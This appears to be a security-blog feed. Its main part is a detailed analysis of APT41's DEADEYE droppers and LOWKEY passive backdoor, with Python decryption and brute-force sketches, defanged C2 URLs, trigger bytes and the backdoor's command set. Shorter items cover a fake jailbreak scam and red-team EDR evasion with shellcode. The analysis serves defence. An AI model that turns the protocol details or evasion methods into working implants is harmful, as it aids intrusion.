While our journey of statistical PDB analysis did not yield a magic malware classifier, it did yield a number of useful findings that we were hoping for:

  1. We developed several file path feature functions which are transferable to other models under development.
  2. By diving into statistical analysis of the dataset, we were able to identify new keywords and logic branches to include in YARA signatures. These signatures have since been deployed and discovered new malware samples.
  3. We answered a number of our own general research questions about PDB paths, and were able to dispel some theories we had not fully tested with data.

While building an independent classifier was not the primary goal, improvements can surely be made to improve the end model accuracy. Generating an even larger, more diverse dataset would likely make the biggest impact on our accuracy, recall, and precision. Further hyperparameter tuning and feature engineering could also help. There is a large amount of established research into text classification using various deep learning methods such as LSTMs, which could be applied effectively to a larger dataset.

PDB paths are only one small family of file paths that we encounter in the field of cyber security. Whether in initial infection, staging, or another part of the attack lifecycle, the file paths found during forensic analysis can reveal incredibly useful information about adversary activity. We look forward to further community research on how to properly extract and represent that information.

LOWKEY: Hunting for the Missing Volume Serial ID

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group: APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services.

This blog post is about the sophisticated passive backdoor we track as LOWKEY, mentioned in the APT41 report and recently unveiled at the FireEye Cyber Defense Summit. We observed LOWKEY being used in highly targeted attacks, utilizing payloads that run only on specific systems. Additional malware family names are used in the blog post and briefly described. For a complete overview of malware used by APT41 please refer to the Technical Annex section of our APT41 report.

The blog post is split into three parts, which are shown in Figure 1. The first describes how we managed to analyze the encrypted payloads. The second part features position independent loaders we observed in multiple samples, adding an additional layer of obfuscation. The final part is about the actual backdoor we call LOWKEY, which comes in two variants, a passive TCP listener and a passive HTTP listener targeting Internet Information Services (IIS).


Figure 1: Blog post overview

DEADEYE – RC5

Tracking APT41 activities over the past months, we observed multiple samples that shared two unique features: the use of RC5 encryption which we don’t encounter often, and a unique string “f@Ukd!rCto R$.”. We track these samples as DEADEYE.

DEADEYE comes in multiple variants:

  • DEADEYE.DOWN has the capability to download additional payloads.
  • DEADEYE.APPEND has additional payloads appended to it.
  • DEADEYE.EXT loads payloads that are already present on the system.

DEADEYE.DOWN

A sample belonging to DEADEYE.DOWN (MD5: 5322816c2567198ad3dfc53d99567d6e) attempts to download two files on the first execution of the malware.

The first file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20170730.jpg. The command and control (C2) server response is first RC5 decrypted with the key “wsprintfA” and then RC5 encrypted with a different key and written to disk as <MODULE_NAME>.mui.

The RC5 key is constructed using the volume serial number of the C drive. The volume serial number is a 4-byte value, usually based on the install time of the system. The volume serial number is XORed with the hard-coded constant “f@Ukd!rCto R$.” and then converted to hex to derive a key of up to 28 bytes in length. The key length can vary if the XORed value contains an embedded zero byte because the lstrlenA API call is used to determine the length of it. Note that the lstrlenA API call happens before the result is converted to hex. If the index of the byte modulo 4 is zero, the hex conversion is in uppercase. The key derivation is illustrated in Table 1.

Volume serial number of the C drive, for example 0xAABBCCDD:

f ^ 0xAA = 0xCC (uppercase)
@ ^ 0xBB = 0xFB (lowercase)
U ^ 0xCC = 0x99 (lowercase)
k ^ 0xDD = 0xB6 (lowercase)
d ^ 0xAA = 0xCE (uppercase)
! ^ 0xBB = 0x9A (lowercase)
r ^ 0xCC = 0xBE (lowercase)
C ^ 0xDD = 0x9E (lowercase)
t ^ 0xAA = 0xDE (uppercase)
o ^ 0xBB = 0xD4 (lowercase)
(0x20) ^ 0xCC = 0xEC (lowercase)
R ^ 0xDD = 0x8F (lowercase)
$ ^ 0xAA = 0x8E (uppercase)
. ^ 0xBB = 0x95 (lowercase)

Derived key: CCfb99b6CE9abe9eDEd4ec8f8E95

Table 1: Key derivation example
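The derivation in Table 1 can be reproduced with a short Python sketch. The byte order of the serial follows the order shown in the table; treat that, and the example serial, as assumptions carried over from the table rather than new analysis:

def derive_rc5_key(volume_serial_bytes: bytes) -> str:
    xor_const = b"f@Ukd!rCto R$."
    # XOR the constant with the serial bytes, cycling through the four serial bytes
    xored = bytes(c ^ volume_serial_bytes[i % 4] for i, c in enumerate(xor_const))
    # lstrlenA stops at the first NUL byte, which can shorten the key
    if 0 in xored:
        xored = xored[:xored.index(0)]
    # Hex-encode; every byte whose index is a multiple of 4 is uppercased
    return "".join(f"{b:02X}" if i % 4 == 0 else f"{b:02x}" for i, b in enumerate(xored))

print(derive_rc5_key(bytes([0xAA, 0xBB, 0xCC, 0xDD])))  # CCfb99b6CE9abe9eDEd4ec8f8E95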

The second file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20160204.jpg. The C2 response is RC5 decrypted with the key “wsprintfA” and then XORed with 0x74, before it is saved as C:\Windows\System32\wcnapi.mui.


Figure 2: 5322816c2567198ad3dfc53d99567d6e download

The sample then determines its own module name, appends the extension mui to it and attempts to decrypt the file using RC5 encryption. This effectively decrypts the file the malware just downloaded and stored encrypted on the system previously. As the file has been encrypted with a key based on the volume serial number it can only be executed on the system it was downloaded on or a system that has the same volume serial number, which would be a remarkable coincidence.

An example mui file is the one with MD5 hash e58d4072c56a5dd3cc5cf768b8f37e5e. Looking at the encrypted file in a hex editor reveals high entropy (7.999779 out of 8). RC5 uses Electronic Code Book (ECB) mode by default. ECB means that each code block (64 bits) is encrypted independently of other code blocks. This means the same plaintext block always results in the same cipher text, independent of its position in the binary. The file has 792,933 bytes in total but almost no duplicate cipher blocks, which means the data likely has an additional layer of encryption.

Without the correct volume serial number or any knowledge of the plaintext, there is no efficient way to decrypt the payload e58d4072c56a5dd3cc5cf768b8f37e5e with just the knowledge of the current sample.

DEADEYE.APPEND

Fortunately searching for the unique string “f@Ukd!rCto R$.“ in combination with artifacts from RC5 reveals additional samples. One of the related samples is DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), which has been previously analyzed by Kaspersky (https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/). This sample is different because it is protected with VMProtect and has the obfuscated binary appended to it. The embedded binary starts at offset 3287552 which can be seen in Figure 3 with the differing File Size and PE Size.


Figure 3: A look at the PE header reveals a larger file size than PE size

The encrypted payload has a slightly lower entropy of 7.990713 out of 8. Looking at the embedded binary in a hex editor reveals multiple occurrences of the byte pattern 51 36 94 A4 26 5B 0F 19, as seen in Figure 4. As this pattern occurs multiple times in a row in the middle of the encrypted data and ECB mode is being used, an educated guess is that the plaintext is supposed to be 00 00 00 00 00 00 00 00.


Figure 4: Repeating byte pattern in 37e100dd8b2ad8b301b130c2bca3f1ea

RC5 Brute Forcer

With this knowledge we decided to take a reference implementation of RC5 and add a main function that accounts for the key derivation algorithm used by the malware samples (see Figure 5). Brute forcing is possible as the key is derived from a single DWORD; even though the final key length might be 28 bytes, there are only 4294967296 possible keys. The code shown in Figure 5 generates all possible volume serial numbers, derives the key from them and tries to decrypt 51 36 94 A4 26 5B 0F 19 to 00 00 00 00 00 00 00 00. Running the RC5 brute forcer for a couple of minutes shows the correct volume serial number for the sample, which is 0xc25cff4c.

Note if you want to run the brute forcer yourself
The number of DWORDs of the key in the reference implementation we used is represented by the global c, and we had to change it to 7 to match the malware’s key length of 28 bytes. There were some issues with the conversion because, in the malware, a zero byte within the generated key ultimately leads to a shorter key length. The implementation we used has a hard-coded key length (c), so we generated multiple executables with c = 6, c = 5, c = 4… as these usually only ran for a couple of minutes to cover the entire key space. All the samples mentioned in Appendix 1 could be solved with c = 7 or c = 6.


Figure 5: Main function RC5 brute forcer
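Since Figure 5 is not reproduced here, the shape of the brute force loop can be sketched in Python. rc5_ecb_decrypt is a hypothetical stand-in for the reference RC5 implementation the authors used, the serial byte order is an assumption, and a pure Python search over 2^32 serials would be far too slow in practice, which is exactly why the original was written in C:

KNOWN_CIPHER = bytes.fromhex("513694A4265B0F19")
KNOWN_PLAIN = bytes(8)  # educated guess: 00 00 00 00 00 00 00 00

def brute_force_serial(rc5_ecb_decrypt):
    """rc5_ecb_decrypt(key: bytes, block: bytes) -> bytes is a hypothetical helper."""
    for serial in range(0x100000000):
        # derive_rc5_key is the sketch shown after Table 1
        key = derive_rc5_key(serial.to_bytes(4, "big")).encode()
        if rc5_ecb_decrypt(key, KNOWN_CIPHER) == KNOWN_PLAIN:
            return serial
    return None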

The decrypted payload belongs to the malware family POISONPLUG (MD5: 84b69b5d14ba5c5c9258370c9505438f). POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded command and control commands.

We confirmed the findings from Kaspersky and additionally found a second command and control URL hxxps://steamcommunity[.]com/id/oswal053, as mentioned in our APT41 report.

Taking everything into account that we learned from DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), we decided to take another look at the encrypted mui file (e58d4072c56a5dd3cc5cf768b8f37e5e). Attempts to brute force the first bytes to match with the ones of the decrypted POISONPLUG payload did not yield any results.

Fortunately, we found additional samples that use the same encryption scheme. In one of the samples the malware authors included two checks to validate the decrypted payload. The expected plaintext at the specified offsets for DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff) is shown in Table 2.

Offset | Expected byte after decryption
0 | 0x48
1 | 0x8B
0x3C0 | 0x48
0x3C1 | 0x83

Table 2: Byte comparisons after decrypting in DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)

Applying these constraints to our brute forcer and trying to decrypt mui file (e58d4072c56a5dd3cc5cf768b8f37e5e) once more resulted in a low number of successful hits which we could then manually check. The correct volume serial number for the encrypted mui is 0x243e2562. Analysis determined the decrypted file is XMRig miner. This also explains why the dropper downloads two files. The first, <MODULE_NAME>.mui is the crypto miner, and the second C:\Windows\System32\wcnapi.mui, is the configuration. The decrypted mui contains another layer of obfuscation and is eventually executed with the command x -c wcnapi.mui. An explanation on how the command was obtained and the additional layer of obfuscation is given in the next part of the blog post.

For a list of samples with the corresponding volume serial numbers, please refer to Appendix 1.

Additional RC4 Layer

An additional RC4 layer has been identified in droppers used by APT41, which we internally track as DEADEYE. The layer has been previously detailed in a blog post by ESET. We wanted to provide some additional information on this, as it was used in some of the samples we managed to brute force.

The additional layer is position independent shellcode containing a reflective DLL loader. The loader decrypts an RC4 encrypted payload and loads it in memory. The code itself is a straightforward loader, with the exception of some interesting artifacts identified during analysis.

As mentioned in the blog post by ESET, the encrypted payload is prepended with a header. It contains the RC4 encryption key and two fields of variable length, which have previously been identified as file names. These two fields are encrypted with the same RC4 encryption key that is also used to decrypt the payload. The header is shown in Table 3.

Header bytes | Meaning
0 - 15 | RC4 key, XOR encoded with 0x37
16 - 19 | Size of the loader stub before the header
20 - 23 | RC4 key size
24 - 27 | Command ASCII size (CAS)
28 - 31 | Command UNICODE size (CUS)
32 - 35 | Size of the encrypted payload
36 - 39 | Launch type
40 - (40 + CAS) | Command ASCII
(40 + CAS) - (40 + CAS + CUS) | Command UNICODE
(40 + CAS + CUS) - (40 + CAS + CUS + size of encrypted payload) | Encrypted payload

Table 3: RC4 header overview
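Based on the layout in Table 3, a hedged Python sketch of parsing this header looks as follows. RC4 is implemented inline; the assumption that each field is decrypted independently with the same key is ours:

import struct

def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation and XOR
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def parse_rc4_layer(blob: bytes):
    key_xored = blob[0:16]
    stub_size, key_size, cas, cus, payload_size, launch_type = struct.unpack_from("<6I", blob, 16)
    key = bytes(b ^ 0x37 for b in key_xored)[:key_size]
    # Assumption: each field is RC4-decrypted independently with the same key
    cmd_ascii = rc4(key, blob[40:40 + cas])
    cmd_unicode = rc4(key, blob[40 + cas:40 + cas + cus]).decode("utf-16-le", "replace")
    payload = rc4(key, blob[40 + cas + cus:40 + cas + cus + payload_size])
    return cmd_ascii, cmd_unicode, payload, launch_type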

Looking at the payloads hidden behind the RC5 layer, we observed that these fields are not limited to file names; instead, they can also contain commands used by the reflective loader. If no command is specified, the default parameter is the file name of the loaded payload. In some instances, this revealed the full file path and file name in the development environment. Table 4 shows some paths and file names. This is also how we found the command (x -c wcnapi.mui) used to launch the decrypted mui file from the first part of the blog post.

MD5 hash | Arguments found in the RC4 layer
7f05d410dc0d1b0e7a3fcc6cdda7a2ff | E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\Inner-Loader\x64\Release\Inner-Loader.dll
7f05d410dc0d1b0e7a3fcc6cdda7a2ff | E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\NetAgent\x64\Release\NetAgent.exe
7f05d410dc0d1b0e7a3fcc6cdda7a2ff | E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\SK3.x\x64\Release\SK3.x.exe
7f05d410dc0d1b0e7a3fcc6cdda7a2ff | UserFunction.dll
7f05d410dc0d1b0e7a3fcc6cdda7a2ff | ProcTran.dll
c11dd805de683822bf4922aecb9bfef5 | E:\code\PortReuse\iis-share\2.5\IIS_Share\x64\Release\IIS_Share.dll
c11dd805de683822bf4922aecb9bfef5 | UserFunction.dll
c11dd805de683822bf4922aecb9bfef5 | ProcTran.dll

Table 4: Decrypted paths and file names

LOWKEY

The final part of the blog post describes the capabilities of the passive backdoor LOWKEY (MD5: 8aab5e2834feb68bb645e0bad4fa10bd) decrypted from DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff). LOWKEY is a passive backdoor that supports commands for a reverse shell, uploading and downloading files, listing and killing processes and file management. We have identified two variants of the LOWKEY backdoor.

The first is a TCP variant that listens on port 53, and the second is an HTTP variant that listens on TCP port 80. The HTTP variant intercepts URL requests matching the UrlPrefix http://+:80/requested.html. The + in the given UrlPrefix means that it will match any host name. It has been briefly mentioned by Kaspersky as “unknown backdoor”.

Both variants are loaded by the reflective loader described in the previous part of the blog post. This means we were able to extract the original file names. They contain meaningful names and provide a first hint on how the backdoor operates.

HTTP variant (MD5: c11dd805de683822bf4922aecb9bfef5)
E:\code\PortReuse\iis-share\2.5\IIS_Share\x64\Release\IIS_Share.dll

TCP variant (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)
E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\SK3.x\x64\Release\SK3.x.exe

The interesting parts are shown in Figure 6. PortReuse describes the general idea behind the backdoor, to operate on a well-known port. The paths also contain version numbers 2.5 and v1.3-53. IIS_Share is used for the HTTP variant and describes the targeted application, DeviceIOContrl-Hook is used for the TCP variant.


Figure 6: Overview important parts of executable path

Both LOWKEY variants are functionally identical with one exception. The TCP variant relies on a second component, a user mode rootkit that is capable of intercepting incoming TCP connections. The internal name used by the developers for that component is E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\NetAgent\x64\Release\NetAgent.exe.


Figure 7: LOWKEY components

Inner-Loader.dll

Inner-Loader.dll is a watch guard for the LOWKEY backdoor. It leverages the GetExtendedTcpTable API to retrieve all processes with an open TCP connection. If a process is listening on TCP port 53 it injects NetAgent.exe into the process. This is done in a loop with a 10 second delay. The loader exits the loop when NetAgent.exe has been successfully injected. After the injection it will create a new thread for the LOWKEY backdoor (SK3.x.exe).

The watch guard enters an endless loop that executes every 20 minutes and ensures that the NetAgent.exe and the LOWKEY backdoor are still active. If this is not the case it will relaunch the backdoor or reinject the NetAgent.exe.

NetAgent.exe

NetAgent.exe is a user mode rootkit that provides covert communication with the LOWKEY backdoor component. It forwards incoming packets, after receiving the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00, to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}.

The component works by hooking the NtDeviceIoControlFile API. It does that by allocating a suspiciously large region of memory, which is used as a global hook table. The table consists of 0x668A0 bytes and has read, write and execute permissions set.

Each hook table entry consists of 3 pointers. The first points to memory containing the original 11 bytes of each hooked function, the second entry contains a pointer to the remaining original instructions and the third pointer points to the function hook. The malware will only hook one function in this manner and therefore allocates an unnecessary large amount of memory. The malware was designed to hook up to 10000 functions this way.

The hook function begins by iterating the global hook table and compares the pointer to the hook function to itself. This is done to find the original instructions for the installed hook, in this case NtDeviceIoControlFile. The malware then executes the saved instructions which results in a regular NtDeviceIoControlFile API call. Afterwards the IoControlCode is compared to 0x12017 (AFD_RECV).

If the IoControlCode does not match, the original API call results are returned.

If they match the malware compares the first 12 bytes of the incoming data. As it is effectively a TCP packet, it is parsing the TCP header to get the data of the packet. The first 12 bytes of the data section are compared against the hard-coded byte pattern: FF FF 01 00 00 01 00 00 00 00 00 00.

If they match it expects to receive additional data, which seems to be unused, and then responds with a 16 byte header 00 00 00 00 00 91 03 00 00 00 00 00 80 1F 00 00, which seems to be hard-coded and to indicate that following packets will be forwarded to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}. The backdoor component (SK3.x.exe) receives and sends data to the named pipe. The hook function will forward all received data from the named pipe back to the socket, effectively allowing a covert communication between the named pipe and the socket.

SK3.x.exe

SK3.x.exe is the actual backdoor component. It supports writing and reading files, modification of file properties, an interactive command shell, TCP relay functionality and listing running processes. The backdoor opens a named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} for communication.

Data received by the backdoor is encrypted with RC4 using the key “CreateThread“ and then XORed with 0x77. All data sent by the backdoor uses the same encryption in reverse order (first XOR with 0x77, then RC4 encrypted with the key “CreateThread“). Encrypted data is preceded by a 16-byte header which is unencrypted containing an identifier and the size of the following encrypted packet.

An example header looks as follows:
00 00 00 00 00 FD 00 00 10 00 00 00 00 00 00 00

Bytes | Meaning
00 00 00 00 00 | Unknown
FD 00 | Bytes 5 and 6 are the command identifier; for a list of all supported identifiers see Table 6 and Table 7
00 | Unknown
10 00 00 00 | Size of the encrypted packet that is sent after the header
00 00 00 00 | Unknown

Table 5: Subcomponents of header
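The traffic encoding itself is simple to express. Here is a small sketch reusing an RC4 routine like the one shown earlier for the DEADEYE header; since RC4 encryption and decryption are the same operation, the two helpers simply mirror the two directions described above:

def backdoor_decode_incoming(data: bytes) -> bytes:
    # Incoming data: RC4 with the key "CreateThread", then XORed with 0x77
    return bytes(b ^ 0x77 for b in rc4(b"CreateThread", data))

def backdoor_encode_outgoing(data: bytes) -> bytes:
    # Outgoing data: the same steps in reverse order (XOR with 0x77 first, then RC4)
    return rc4(b"CreateThread", bytes(b ^ 0x77 for b in data))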

The backdoor supports the commands listed in Table 6 and Table 7. Most commands expect a string at the beginning which likely describes the command and is for the convenience of the operators, but this string isn't actively used by the malware and could be anything. For example, KILL <PID> could also be A <PID>. Some of the commands rely on two payloads (UserFunction.dll and ProcTran.dll) that are embedded in the backdoor and are either injected into another process or launch another process.

UserFunction.dll

Userfunction.dll starts a hidden cmd.exe process, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} and forwards all received data from the pipe to the standard input of the cmd.exe process. All output from the process is redirected back to the named pipe. This allows interaction with the shell over the named pipe.

ProcTran.dll

The component opens a TCP connection to the provided host and port, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} and forwards all received data from the pipe to the opened TCP connection. All received packets on the connection are forwarded to the named pipe. This allows interaction with the TCP connection over the named pipe.

| Identifier | Arguments | Description |
| --- | --- | --- |
| 0xC8 | <cmd> <arg1> <arg2> | Provides a simple shell that supports the following commands: dir, copy, move, del, systeminfo and cd. These match the functionality of standard commands from a shell. This is the only case where the <cmd> is actually used. |
| 0xC9 | <cmd> <arg1> | The argument is interpreted as a process id (PID). The backdoor injects UserFunction.dll into the process, which is an interactive shell that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00000}. The backdoor will then forward incoming data to the named pipe, allowing for communication with the opened shell. If no PID is provided, cmd.exe is launched as a child process of the backdoor process with input and output redirected to the named pipe Microsoft Ole Object {30000-7100-12985-00001-00001}. |
| 0xCA | <cmd> <arg1> <arg2> | Writes data to a file. The first argument is the <file_name>, the second argument is an offset into the file. |
| 0xCB | <cmd> <arg1> <arg2> <arg3> | Reads data from a file. The first argument is the <file_name>, the second argument is an offset into the file; the third argument is optional and its exact purpose is unknown. |
| 0xFA | - | Lists running processes, including the process name, PID, process owner and the executable path. |
| 0xFB | <cmd> <arg1> | Kills the process with the provided process id (PID). |
| 0xFC | <cmd> <arg1> <arg2> | Copies the CreationTime, LastAccessTime and LastWriteTime from the second argument and applies them to the first argument. Both arguments are expected to be full file paths. The order of the arguments is a bit unusual, as one would usually apply the access times from the second argument to the third. |
| 0xFD | - | Lists running processes with additional details like the SessionId and the CommandLine by executing the WMI query SELECT Name,ProcessId,SessionId,CommandLine,ExecutablePath FROM Win32_Process. |
| 0xFE | - | Ping command; the malware responds with the byte sequence 00 00 00 00 00 65 00 00 00 00 00 00 06 00 00 00. Experiments with the backdoor revealed that the identifier 0x65 seems to indicate a successful operation, whereas 0x66 indicates an error. |

Table 6: C2 commands

The commands listed in Table 7 are used to provide functionality of a TCP traffic relay. This allows operators to communicate through the backdoor with another host via TCP. This could be used for lateral movement in a network. For example, one instance of the backdoor could be used as a jump host and additional hosts in the target network could be reached via the TCP traffic relay. Note that the commands 0xD2, 0xD3 and 0xD6 listed in Table 7 can be used in the main backdoor thread, without having to use the ProcTran.dll.

| Identifier | Arguments | Description |
| --- | --- | --- |
| 0x105 | <cmd> <arg1> | The argument is interpreted as a process id (PID). The backdoor injects ProcTran.dll into the process, which is a TCP traffic relay component that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00001}. The commands 0xD2, 0xD3 and 0xD6 can then be used with the component. |
| 0xD2 | <arg1> <arg2> | Opens a connection to the provided host and port; the first argument is the host, the second the port. On success a header with the identifier set to 0xD4 is returned (00 00 00 00 00 D4 00 00 00 00 00 00 00 00 00 00). This effectively establishes a TCP traffic relay allowing operators to communicate with another system through the backdoored machine. |
| 0xD3 | <arg1> | Receives and sends data over the connection opened by the 0xD2 command. Received data is first RC4 decrypted with the key “CreateThread” and then single-byte XOR decoded with 0x77. Data sent back is relayed directly without any additional encryption. |
| 0xD6 | - | Closes the socket connection that had been established by the 0xD2 command. |
| 0xCF | - | Closes the named pipe Microsoft Ole Object {30000-7100-12985-00000-00001} that is used to communicate with the injected ProcTran.dll. This seems to terminate the thread created in the target process by the 0x105 command. |

Table 7: C2 commands TCP relay

Summary

The TCP LOWKEY variant passively listens for the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00 on TCP port 53 to be activated. The backdoor then uses up to three named pipes for communication. One pipe is used for the main communication of the backdoor, the other ones are used on demand for the embedded payloads.

  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} main communication pipe
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} named pipe used for interaction with the TCP relay module ProcTran.dll
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} named pipe used for the interactive shell module UserFunction.dll
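Because the activation sequence is static, it lends itself to simple network detection. The sketch below is our own illustration (not FireEye tooling) of checking a captured TCP payload for the trigger; a Snort/Suricata content rule over the same bytes on port 53 would be the production equivalent.

LOWKEY_TRIGGER = bytes.fromhex("FF FF 01 00 00 01 00 00 00 00 00 00")

def looks_like_lowkey_activation(dst_port: int, tcp_payload: bytes) -> bool:
    # The hook only inspects traffic arriving on TCP port 53 and compares
    # the first 12 bytes of the data section against the hard-coded trigger.
    return dst_port == 53 and tcp_payload[:12] == LOWKEY_TRIGGER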

Figure 8 summarizes how the LOWKEY components interact with each other.


Figure 8: LOWKEY passive backdoor overview

Appendix

| MD5 HASH | Correct Volume Serial | Dropper Family | Final Payload Family |
| --- | --- | --- | --- |
| 2b9244c526e2c2b6d40e79a8c3edb93c | 0xde82ce06 | DEADEYE.APPEND | POISONPLUG |
| 04be89ff5d217796bc68678d2508a0d7 | 0x56a80cc8 | DEADEYE.APPEND | POISONPLUG |
| 092ae9ce61f6575344c424967bd79437 | 0x58b5ef5c | DEADEYE.APPEND | LOWKEY.HTTP |
| 37e100dd8b2ad8b301b130c2bca3f1ea | 0xc25cff4c | DEADEYE.APPEND | POISONPLUG |
| 39fe65a46c03b930ccf0d552ed3c17b1 | 0x24773b24 | DEADEYE.APPEND | POISONPLUG |
| 5322816c2567198ad3dfc53d99567d6e | - | DEADEYE.DOWN | - |
| 557ff68798c71652db8a85596a4bab72 | 0x4cebb6e9 | DEADEYE.APPEND | POISONPLUG |
| 64e09cf2894d6e5ac50207edff787ed7 | 0x64fd8753 | DEADEYE.APPEND | POISONPLUG |
| 650a3dce1380f9194361e0c7be9ffb97 | 0xeaa61f82 | DEADEYE.APPEND | POISONPLUG |
| 7dc6bbc202e039dd989e1e2a93d2ec2d | 0xa8c5a006 | DEADEYE.APPEND | LOWKEY |
| 7f05d410dc0d1b0e7a3fcc6cdda7a2ff | 0x9438158b | DEADEYE.APPEND | LOWKEY |
| 904bbe5ac0d53e74a6cefb14ebd58c0b | 0xde82ce06 | DEADEYE.APPEND | POISONPLUG |
| c11dd805de683822bf4922aecb9bfef5 | 0xcab011e1 | DEADEYE.APPEND | LOWKEY.HTTP |
| d49c186b1bfd7c9233e5815c2572eb98 | 0x4a23bd79 | DEADEYE.APPEND | LOWKEY |
| e58d4072c56a5dd3cc5cf768b8f37e5e | 0x243e2562 | None - encrypted data | XMRIG |
| eb37c75369046fb1076450b3c34fb8ab | 0x00e5a39e | DEADEYE.APPEND | LOWKEY |
| ee5b707249c562dc916b125e32950c8d | 0xdecb3d5d | DEADEYE.APPEND | POISONPLUG |
| ff8d92dfbcda572ef97c142017eec658 | 0xde82ce06 | DEADEYE.APPEND | POISONPLUG |
| ffd0f34739c1568797891b9961111464 | 0xde82ce06 | DEADEYE.APPEND | POISONPLUG |

Appendix 1: List of samples with RC5 encrypted payloads

Checkrain fake iOS jailbreak leads to click fraud

Attackers are capitalizing on the recent discovery of a new vulnerability that exists across legacy iOS hardware. Cisco Talos recently discovered a malicious actor using a fake website that claims to give iPhone users the ability to jailbreak their phones. However, this site just prompts users to download a malicious profile which allows the attacker to conduct click-fraud.

Checkm8 is a vulnerability in the bootrom of some legacy iOS devices that allows users to control the boot process. The vulnerability impacts all legacy models of the iPhone from the 4S through the X. The campaign we’ll cover in this post tries to capitalize off of checkra1n, a project that uses the checkm8 vulnerability to modify the bootrom and load a jailbroken image onto the iPhone. Checkm8 can be exploited with an open-source tool called “ipwndfu” developed by Axi0mX.

The attackers we’re tracking run a malicious website called checkrain[.]com that aims to draw in users who are looking for checkra1n.

This discovery made headlines and caught the attention of many security researchers. Jailbreaking a mobile device can be attractive to researchers, average users and malicious actors. A researcher or user may want to jailbreak phones to bypass standard restrictions put in place by the manufacturer to download additional software onto the device or look deeper into the inner workings of the phone. However, an attacker could jailbreak a device for malicious purposes, eventually obtaining full control of the device.

 

Read More >>>

Threat Roundup for October 4 to October 11

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Oct 4 and Oct 11. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10112019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Staying Hidden on the Endpoint: Evading Detection with Shellcode

True red team assessments require a secondary objective of avoiding detection. Part of the glory of a successful red team assessment is not getting detected by anything or anyone on the system. As modern Endpoint Detection and Response (EDR) products have matured over the years, red teams have had to follow suit. This blog post will provide some insight into how the FireEye Mandiant Red Team crafts payloads to bypass modern EDR products and get full command and control (C2) on their victims’ systems.

Shellcode injection or execution is our favorite method for launching our C2 payload on a victim system; but what is shellcode? Michael Sikorski defines shellcode as a “…term commonly used to describe any piece of self-contained executable code” (Practical Malware Analysis). Most commercial penetration testing frameworks such as Empire, Cobalt Strike, or Metasploit have a shellcode generator built into the tool. The generated shellcode is output in either a binary or hex format, depending on whether you generate it as raw output or as application source.

Why do we use shellcode for all our payloads?

The use of shellcode in our red team assessment payloads allows us to be incredibly flexible in the type of payload we use. Shellcode runners can be written in a wide range of programming languages that can be incorporated into many types of payloads. This flexibility allows us to customize our payloads to support the specific needs of our clients and of any given situation that may arise during a red team assessment. Since shellcode can be launched from inside a payload or injected into an already running process, we can use several techniques to increase the ability of our payloads to evade detection from EDR products depending on the scenario and technology in place in the target environment. Several techniques exist for obfuscating shellcode, such as encryption and custom encoding, that make it difficult for EDR products to detect shellcode from commercial C2 tools on its own. The flexibility and evasive properties of shellcode are the primary reasons that we rely heavily on shellcode-based payloads during red team assessments.

Shellcode Injection Vs. Execution

One of the most crucial parts of any red team assessment is developing a payload that will successfully, reliably, and stealthily run on the target system. Payloads can either execute shellcode from within their own process or inject shellcode into the address space of another process that will ultimately execute the shellcode. For the purposes of this blog post we’ll refer to shellcode injection as shellcode executed inside a remote process and shellcode execution as shellcode executed inside the payload process.

